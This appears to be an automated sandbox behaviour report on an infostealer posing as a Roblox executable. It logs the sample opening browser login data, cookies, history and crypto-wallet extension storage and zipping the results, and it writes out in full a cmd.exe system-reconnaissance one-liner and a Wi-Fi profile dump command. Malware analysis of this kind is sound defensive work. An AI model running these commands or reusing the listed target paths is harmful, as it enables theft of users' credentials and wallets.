Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Games VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\screenshot.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\screenshot.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\process_info.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Browsers\Firefox\History.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Browsers\Cookies.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\system_info.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\network_info.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Sessions VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Tokens VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Browsers VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Wallets VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\network_info.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\network_info.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\network_info.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\process_info.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\process_info.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\process_info.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\screenshot.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\screenshot.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\screenshot.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\system_info.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Browsers VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Browsers\Firefox VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Browsers\Cookies.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Browsers\Cookies.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Browsers\Cookies.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Browsers\Firefox VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Browsers\Firefox\History.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67.zip VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\net1.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeCode function: 3_2_00007FFBAA7FBC74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_00007FFBAA7FBC74
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: wireshark.exe
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: ollydbg.exe
                  Source: C:\Windows\System32\net.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.1951447889.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: roblox1.exe PID: 1364, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: stub.exe PID: 3428, type: MEMORYSTR
                  Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, type: DROPPED
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File created: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Browsers\Cookies.txt
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File created: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Browsers\Firefox\History.txt
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File created: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\system_info.txt
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File created: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\process_info.txt
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File created: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\network_info.txt
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: aElectrum
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: aJaxx
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: aExodus
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: aEthereum
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: akeystore
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\NETSTAT.EXE netstat -ano
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\to-be-removed
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e9edf720-d88f-46ea-8d95-7134a339b3c1
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkib
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\crashes\events
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\tmp
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\84b89d2b-fec7-4b59-87f2-603dcfbd43dd
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\bookmarkbackups
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
